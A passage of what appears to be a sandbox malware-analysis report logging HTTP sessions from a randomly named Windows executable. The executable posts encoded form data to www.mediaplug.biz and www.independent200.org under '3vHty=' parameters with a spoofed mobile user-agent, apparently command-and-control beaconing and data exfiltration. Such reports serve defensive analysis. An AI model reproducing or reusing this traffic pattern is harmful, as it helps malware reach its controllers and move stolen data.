Sep 16, 2024 14:09:57.845737934 CEST	727	IN	HTTP/1.1 405 Not Allowed Server: nginx/1.14.2 Date: Mon, 16 Sep 2024 12:09:57 GMT Content-Type: text/html Content-Length: 575 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 [TRUNCATED] Data Ascii: <html><head><title>405 Not Allowed</title></head><body bgcolor="white"><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.14.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49743	66.81.203.135	80	5552	C:\Program Files (x86)\hnpfJeltBUPVzBeYBfRGXmIlUDDfPORbVWAFPoepSQkyGPmBFtrDhFvHggVwOxOFOCwJuXKKCnQu\tfTpvPSAdwQ.exe

Timestamp	Bytes transferred	Direction	Data
Sep 16, 2024 14:09:59.662605047 CEST	798	OUT	POST /osde/ HTTP/1.1 Host: www.mediaplug.biz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Connection: close Content-Length: 222 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Origin: http://www.mediaplug.biz Referer: http://www.mediaplug.biz/osde/ User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36 Data Raw: 33 76 48 74 79 3d 63 55 5a 74 32 7a 31 70 76 4d 61 79 74 4c 59 58 50 37 75 63 31 52 56 41 6c 75 74 6e 78 6a 77 77 33 36 4b 79 4a 39 63 43 6e 4c 32 57 7a 4d 76 2f 4d 6f 41 39 79 6e 46 30 58 6c 66 55 50 57 62 32 45 45 6f 31 50 65 5a 5a 5a 48 64 63 7a 38 50 4c 34 76 42 45 49 57 47 53 49 43 6a 35 71 67 46 46 52 49 55 32 76 42 4b 69 77 6b 5a 43 6d 76 7a 6d 71 54 37 42 6c 64 2f 52 38 36 4d 68 6b 38 62 4b 72 6b 57 78 66 43 32 2b 78 6e 79 4d 72 79 52 63 77 43 5a 4a 67 37 46 49 54 46 38 51 63 38 36 63 57 46 7a 42 6b 4b 6d 45 65 6d 63 63 4d 63 2b 79 46 34 66 72 63 2f 2f 38 66 6d 2f 4c 51 33 6f 54 52 64 79 51 53 4a 42 7a 33 39 48 41 71 4e 50 68 5a 50 37 2b 64 65 34 3d Data Ascii: 3vHty=cUZt2z1pvMaytLYXP7uc1RVAlutnxjww36KyJ9cCnL2WzMv/MoA9ynF0XlfUPWb2EEo1PeZZZHdcz8PL4vBEIWGSICj5qgFFRIU2vBKiwkZCmvzmqT7Bld/R86Mhk8bKrkWxfC2+xnyMryRcwCZJg7FITF8Qc86cWFzBkKmEemccMc+yF4frc//8fm/LQ3oTRdyQSJBz39HAqNPhZP7+de4=
Sep 16, 2024 14:10:00.239196062 CEST	727	IN	HTTP/1.1 405 Not Allowed Server: nginx/1.14.2 Date: Mon, 16 Sep 2024 12:10:00 GMT Content-Type: text/html Content-Length: 575 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 [TRUNCATED] Data Ascii: <html><head><title>405 Not Allowed</title></head><body bgcolor="white"><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.14.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49744	66.81.203.135	80	5552	C:\Program Files (x86)\hnpfJeltBUPVzBeYBfRGXmIlUDDfPORbVWAFPoepSQkyGPmBFtrDhFvHggVwOxOFOCwJuXKKCnQu\tfTpvPSAdwQ.exe

Timestamp	Bytes transferred	Direction	Data
Sep 16, 2024 14:10:02.205389023 CEST	10880	OUT	POST /osde/ HTTP/1.1 Host: www.mediaplug.biz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Connection: close Content-Length: 10302 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Origin: http://www.mediaplug.biz Referer: http://www.mediaplug.biz/osde/ User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36 Data Raw: 33 76 48 74 79 3d 63 55 5a 74 32 7a 31 70 76 4d 61 79 74 4c 59 58 50 37 75 63 31 52 56 41 6c 75 74 6e 78 6a 77 77 33 36 4b 79 4a 39 63 43 6e 4c 2b 57 7a 36 37 2f 65 66 38 39 7a 6e 46 30 61 46 66 4a 50 57 62 72 45 48 59 78 50 65 55 73 5a 42 5a 63 68 4a 62 4c 78 2b 42 45 47 57 47 53 47 53 6a 34 6b 41 46 71 52 49 45 79 76 43 79 69 77 6b 5a 43 6d 74 48 6d 36 33 76 42 6e 64 2f 51 30 61 4d 74 67 38 61 6e 72 6b 4f 50 66 43 6a 4c 77 58 53 4d 71 57 39 63 32 77 78 4a 73 37 46 64 55 46 39 44 63 38 2b 39 57 46 2f 4e 6b 4c 53 2b 65 6b 41 63 63 62 58 4e 42 4a 58 6e 47 4f 48 42 50 56 72 2b 62 31 34 70 4a 75 43 49 62 4a 39 59 33 70 4f 6f 6c 73 69 72 42 39 6a 76 47 70 6c 50 51 58 4c 32 56 64 6c 44 4a 4b 6e 2f 64 34 2b 48 65 7a 48 79 73 52 59 34 6d 39 45 73 41 35 48 36 42 4d 77 56 77 79 5a 33 37 55 79 4c 48 49 36 43 57 57 49 58 32 6c 4b 50 64 76 7a 6e 44 76 32 6d 43 7a 4a 50 55 6d 61 76 66 46 38 6d 66 65 62 36 48 55 6a 6e 6c 6f 59 38 72 6e 48 44 57 6a 4e 65 34 71 57 44 52 57 39 55 4d 4d 65 74 61 51 56 74 66 64 4a 53 [TRUNCATED] Data Ascii: 3vHty=cUZt2z1pvMaytLYXP7uc1RVAlutnxjww36KyJ9cCnL+Wz67/ef89znF0aFfJPWbrEHYxPeUsZBZchJbLx+BEGWGSGSj4kAFqRIEyvCyiwkZCmtHm63vBnd/Q0aMtg8anrkOPfCjLwXSMqW9c2wxJs7FdUF9Dc8+9WF/NkLS+ekAccbXNBJXnGOHBPVr+b14pJuCIbJ9Y3pOolsirB9jvGplPQXL2VdlDJKn/d4+HezHysRY4m9EsA5H6BMwVwyZ37UyLHI6CWWIX2lKPdvznDv2mCzJPUmavfF8mfeb6HUjnloY8rnHDWjNe4qWDRW9UMMetaQVtfdJSLOj/M0qRztPJYxXV2OWJWkh0LPDIx1H0rCkp9na9tURANE73XL4GuDDeHHUnfESM9DU8zPoiwO9PIAmGdgJABmYnJ5ZqDaZE6uCYUyQLzwHZZs6I4qGhzh76YeP/f4GwGYBCvVrMFZ7iNR+x/EIhUr7LIwAuFc/yYzc/UVGJ9Hekqu46ArEBb/7pr/1Cgx73550W/PLYMr5K5D6zCM3j3lXpxiQ//7BlO60xBATPZcF8YoXqinxIUg9kUNHUQpqYT5/8GLb7X6Lz5/RG8ZRLPxEr5RDWx9rgigSOOLjIb8YF/UJN17E6qgo0+KfGGng2edmioNA+aDxt6ip2tqo7LHimzoUDRoGk6SLjnDsQfmiRlhnKzVk8vtwydPBOe8xxcjJMflbvPvCrHYaZKfLJ1GPHOdruJkxobF8RyWhwNxs5oYq0eknBDqKvbb6nTAYNT/kfAC/iyOqfljJJuLlqRsOAlOreDQmSBb3XO48vJhcoxdCfj3gsUtPWC76xhLLdR7HXMoIfqSxk+tXcwlG4mmEk8GAEdOEjIICoflneChyp3QbgIKh4BJyv3uCDIIAGAxlpyQMPDn0euhw2D3Ou/dri/qhD/Vgc3KAzoMhDuIVJj2imSNlM9zbb+sGbzsI2ej3OmZRhZyjEgNz9JyuP1+0lggS1qgfITD [TRUNCATED]
Sep 16, 2024 14:10:02.776320934 CEST	727	IN	HTTP/1.1 405 Not Allowed Server: nginx/1.14.2 Date: Mon, 16 Sep 2024 12:10:02 GMT Content-Type: text/html Content-Length: 575 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 [TRUNCATED] Data Ascii: <html><head><title>405 Not Allowed</title></head><body bgcolor="white"><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.14.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49745	66.81.203.135	80	5552	C:\Program Files (x86)\hnpfJeltBUPVzBeYBfRGXmIlUDDfPORbVWAFPoepSQkyGPmBFtrDhFvHggVwOxOFOCwJuXKKCnQu\tfTpvPSAdwQ.exe

Timestamp	Bytes transferred	Direction	Data
Sep 16, 2024 14:10:04.803349972 CEST	511	OUT	GET /osde/?3vHty=RWxN1EBNqsrI97geHJKF+m1NqN4D5Qwm3eCTWsUjqsqAz5HjDo5OrFUtMmzwWkvzE1VCadoWcR1nh8rv/P1sJReZCD/pggQ9SZws5yKjtGx+wP+UoHuai7o=&fx=kLn8bpp8IVh HTTP/1.1 Host: www.mediaplug.biz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Connection: close User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
Sep 16, 2024 14:10:05.492681980 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.14.2 Date: Mon, 16 Sep 2024 12:10:05 GMT Content-Type: text/html Content-Length: 1432 Last-Modified: Tue, 14 May 2024 12:20:23 GMT Connection: close ETag: "66435707-598" Accept-Ranges: bytes Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 68 74 6d 6c 2c 0d 0a 20 20 20 20 20 20 62 6f 64 79 2c 0d 0a 20 20 20 20 20 20 23 70 61 72 74 6e 65 72 2c 0d 0a 20 20 20 20 20 20 69 66 72 61 6d 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 62 61 73 65 6c 69 6e 65 3b 0d [TRUNCATED] Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <style type="text/css"> html, body, #partner, iframe { height: 100%; width: 100%; margin: 0; padding: 0; border: 0; outline: 0; font-size: 100%; vertical-align: baseline; background: transparent; } /body { overflow:hidden; }/ </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"> </head> <body> <div style="text-align: center;"> <p>This domain is pending renewal or has expired. Please contact the domain provider with questions.</p></div> <div id="partner"></div> <script type="text/j
Sep 16, 2024 14:10:05.492705107 CEST	430	IN	Data Raw: 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 0d 0a 20 20 20 20 20 20 20 20 27 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 Data Ascii: avascript"> document.write( '<script type="text/javascript" language="JavaScript"' + 'src="//sedoparking.com/frmpark/' + window.location.host + '/' + 'Skenzor22' + '/park.js?beforeBodyEndHTML

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49746	103.42.108.46	80	5552	C:\Program Files (x86)\hnpfJeltBUPVzBeYBfRGXmIlUDDfPORbVWAFPoepSQkyGPmBFtrDhFvHggVwOxOFOCwJuXKKCnQu\tfTpvPSAdwQ.exe

Timestamp	Bytes transferred	Direction	Data
Sep 16, 2024 14:10:11.025856972 CEST	793	OUT	POST /yl6y/ HTTP/1.1 Host: www.independent200.org Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Connection: close Content-Length: 202 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Origin: http://www.independent200.org Referer: http://www.independent200.org/yl6y/ User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36 Data Raw: 33 76 48 74 79 3d 64 4e 69 4c 61 73 46 48 56 73 63 34 34 2b 61 4e 46 42 6d 66 4b 2f 77 73 66 62 72 45 4d 38 41 4a 76 30 70 39 6b 2b 66 65 38 64 6e 33 5a 4e 37 68 54 64 52 43 61 73 31 33 57 4f 43 42 61 42 54 45 64 66 4d 44 65 59 41 4e 48 6e 56 39 76 6f 76 30 4a 70 42 4f 41 79 56 56 54 50 54 38 48 69 55 75 65 56 39 6f 56 32 44 50 51 50 6b 73 70 2b 30 47 44 72 66 63 61 54 56 4b 45 79 58 58 51 56 43 6b 67 77 71 6f 61 66 78 4e 6f 52 78 4c 57 54 6f 61 78 75 63 56 74 41 49 43 63 70 57 68 42 41 69 35 59 4a 42 54 2b 2b 5a 37 76 57 6a 6d 45 69 43 66 51 78 66 5a 4f 52 53 4e 2b 4f 38 39 44 54 76 55 39 41 3d 3d Data Ascii: 3vHty=dNiLasFHVsc44+aNFBmfK/wsfbrEM8AJv0p9k+fe8dn3ZN7hTdRCas13WOCBaBTEdfMDeYANHnV9vov0JpBOAyVVTPT8HiUueV9oV2DPQPksp+0GDrfcaTVKEyXXQVCkgwqoafxNoRxLWToaxucVtAICcpWhBAi5YJBT++Z7vWjmEiCfQxfZORSN+O89DTvU9A==
Sep 16, 2024 14:10:11.893394947 CEST	154	IN	HTTP/1.1 403 Forbidden Content-Type: text/plain; charset=utf-8 Date: Mon, 16 Sep 2024 12:10:11 GMT Content-Length: 11 Connection: close Data Raw: 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: Bad Request

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49747	103.42.108.46	80	5552	C:\Program Files (x86)\hnpfJeltBUPVzBeYBfRGXmIlUDDfPORbVWAFPoepSQkyGPmBFtrDhFvHggVwOxOFOCwJuXKKCnQu\tfTpvPSAdwQ.exe

Timestamp	Bytes transferred	Direction	Data
Sep 16, 2024 14:10:13.570199966 CEST	813	OUT	POST /yl6y/ HTTP/1.1 Host: www.independent200.org Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Connection: close Content-Length: 222 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Origin: http://www.independent200.org Referer: http://www.independent200.org/yl6y/ User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36 Data Raw: 33 76 48 74 79 3d 64 4e 69 4c 61 73 46 48 56 73 63 34 37 65 4b 4e 4a 42 61 66 44 2f 78 65 61 62 72 45 48 63 41 4e 76 30 31 39 6b 39 53 54 39 76 7a 33 5a 6f 2f 68 53 63 52 43 64 73 31 33 5a 75 44 4c 45 78 53 70 64 65 77 68 65 5a 4d 4e 48 6e 42 39 76 71 6e 30 4a 65 39 42 53 53 56 54 50 50 54 2b 59 79 55 75 65 56 39 6f 56 32 58 6c 51 50 73 73 70 4f 6b 47 43 50 72 44 5a 54 56 4a 54 43 58 58 62 31 43 67 67 77 72 39 61 65 39 6e 6f 53 4a 4c 57 53 30 61 78 36 49 4b 32 77 49 45 53 4a 58 4e 41 6a 62 69 63 62 38 64 77 2f 68 44 6c 54 48 36 4d 45 54 46 42 41 2b 4f 63 52 32 2b 6a 4a 31 4a 4f 51 53 64 6d 45 79 59 4e 74 5a 41 2f 39 59 58 53 46 63 38 76 6e 49 74 49 61 77 3d Data Ascii: 3vHty=dNiLasFHVsc47eKNJBafD/xeabrEHcANv019k9ST9vz3Zo/hScRCds13ZuDLExSpdewheZMNHnB9vqn0Je9BSSVTPPT+YyUueV9oV2XlQPsspOkGCPrDZTVJTCXXb1Cggwr9ae9noSJLWS0ax6IK2wIESJXNAjbicb8dw/hDlTH6METFBA+OcR2+jJ1JOQSdmEyYNtZA/9YXSFc8vnItIaw=
Sep 16, 2024 14:10:14.426527023 CEST	154	IN	HTTP/1.1 403 Forbidden Content-Type: text/plain; charset=utf-8 Date: Mon, 16 Sep 2024 12:10:14 GMT Content-Length: 11 Connection: close Data Raw: 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: Bad Request

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49748	103.42.108.46	80	5552	C:\Program Files (x86)\hnpfJeltBUPVzBeYBfRGXmIlUDDfPORbVWAFPoepSQkyGPmBFtrDhFvHggVwOxOFOCwJuXKKCnQu\tfTpvPSAdwQ.exe

Timestamp	Bytes transferred	Direction	Data
Sep 16, 2024 14:10:16.109509945 CEST	10895	OUT	POST /yl6y/ HTTP/1.1 Host: www.independent200.org Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Connection: close Content-Length: 10302 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Origin: http://www.independent200.org Referer: http://www.independent200.org/yl6y/ User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36 Data Raw: 33 76 48 74 79 3d 64 4e 69 4c 61 73 46 48 56 73 63 34 37 65 4b 4e 4a 42 61 66 44 2f 78 65 61 62 72 45 48 63 41 4e 76 30 31 39 6b 39 53 54 39 76 72 33 59 61 33 68 51 2f 4a 43 63 73 31 33 48 2b 44 49 45 78 53 52 64 66 59 6c 65 5a 51 37 48 68 46 39 75 49 66 30 50 71 70 42 4c 69 56 54 58 50 54 7a 48 69 55 37 65 55 4e 57 56 32 48 6c 51 50 73 73 70 49 67 47 46 62 66 44 56 7a 56 4b 45 79 58 6c 51 56 43 59 67 30 2b 4b 61 65 70 64 6f 69 70 4c 57 32 55 61 2b 70 67 4b 72 41 49 38 56 4a 58 56 41 69 6e 48 63 62 77 6e 77 2f 46 6c 6c 56 37 36 4d 44 6d 66 46 6b 6e 54 64 51 4b 50 2b 4c 51 70 4f 44 37 66 67 31 36 58 63 64 74 6a 6a 4d 64 36 51 56 52 73 33 6e 59 75 4d 66 61 2f 74 68 35 53 45 48 52 41 61 50 34 4c 73 4a 4f 56 56 71 57 44 74 51 30 57 67 69 77 4e 50 7a 65 63 34 43 6b 56 6a 6a 41 6d 32 64 4b 48 68 69 7a 33 49 4d 41 57 33 39 56 4d 36 6e 53 44 77 32 32 55 73 6b 7a 4b 4e 4a 31 38 4c 39 74 6e 31 58 41 4c 4d 4a 39 56 36 30 61 50 38 30 32 77 45 61 45 59 4b 55 6d 6b 45 49 47 6a 6b 70 49 38 79 52 34 38 59 6c 4c 6f [TRUNCATED] Data Ascii: 3vHty=dNiLasFHVsc47eKNJBafD/xeabrEHcANv019k9ST9vr3Ya3hQ/JCcs13H+DIExSRdfYleZQ7HhF9uIf0PqpBLiVTXPTzHiU7eUNWV2HlQPsspIgGFbfDVzVKEyXlQVCYg0+KaepdoipLW2Ua+pgKrAI8VJXVAinHcbwnw/FllV76MDmfFknTdQKP+LQpOD7fg16XcdtjjMd6QVRs3nYuMfa/th5SEHRAaP4LsJOVVqWDtQ0WgiwNPzec4CkVjjAm2dKHhiz3IMAW39VM6nSDw22UskzKNJ18L9tn1XALMJ9V60aP802wEaEYKUmkEIGjkpI8yR48YlLoC3V/zw7fHfuXRO3HlzjzdoTP0BHseBRR7A470gHp9rIWlsY0oVL1ie7ahetkuTu2tb+Zi6bYbyef6OPqn0kfTUza+Ffiq70A/flBio+YhwS23iRRRj73OW6ft4RoRdTMqdtqLvhMBbs+JLv47tNnWW3bdWqp323NQ9J6moLc3UFP8PCXPAgJaAkJX7zMIaOZ/EC7ToyWQ5zPeI7O6Mgcj/MY/7qbCUG19Ri76G3kgT1jkBkf0qM/YhouURqbphXF07p5a6UvvPCae5EVssQ7/itf/xAe4+gLErxWNywpJcNvfu0GXP5+feXloNhUY9xHHoUTu+NK3OsyADYDn6JayIZrFSDXZrtoS+XbfOBGn2HB2FFl0Tsw2kahXqEZ5q+77iL64cHn5xKpJS8HRmzkNG9YN8pSGAdYQRj4y/ym1NxsPRekuXT0FPcbvafHX7+Hotp/iKO1m3B/B1bucezvkBqkAdMB0sgzelbwA+ePUsQxemd+n7DyJlYlxH4JzcLL55OCqzLTX9aVcytKQMpQhlzLPRgZRTN/auQjTdxKrHQDaEcIohbyZCmRSrn6hI+xXxE5aVQnn0m89nDS4fIFZISYnqBRelS6eGOzHsSOSu7ladkzH5+qMwvUtPvwyrvoOL14tVLYfOwcpD1S3a4c4I66LGvw5p0UaJ [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49749	103.42.108.46	80	5552	C:\Program Files (x86)\hnpfJeltBUPVzBeYBfRGXmIlUDDfPORbVWAFPoepSQkyGPmBFtrDhFvHggVwOxOFOCwJuXKKCnQu\tfTpvPSAdwQ.exe

Timestamp	Bytes transferred	Direction	Data
Sep 16, 2024 14:10:18.654952049 CEST	516	OUT	GET /yl6y/?3vHty=QPKrZbNCTa4h9OiZDCqTEYRHVYq8I9pQgXRm4OHk1vP2UInoYMEgLbhzG96tdyW5WcZsMbYjLnFg+NDONb5+DVpCe+n8LSxyZkRiMUCXQdQdgo9ddvaEU2A=&fx=kLn8bpp8IVh HTTP/1.1 Host: www.independent200.org Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Connection: close User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
Sep 16, 2024 14:10:19.512655973 CEST	154	IN	HTTP/1.1 403 Forbidden Content-Type: text/plain; charset=utf-8 Date: Mon, 16 Sep 2024 12:10:19 GMT Content-Length: 11 Connection: close Data Raw: 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: Bad Request

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49750	3.33.130.190	80	5552	C:\Program Files (x86)\hnpfJeltBUPVzBeYBfRGXmIlUDDfPORbVWAFPoepSQkyGPmBFtrDhFvHggVwOxOFOCwJuXKKCnQu\tfTpvPSAdwQ.exe

Timestamp	Bytes transferred	Direction	Data
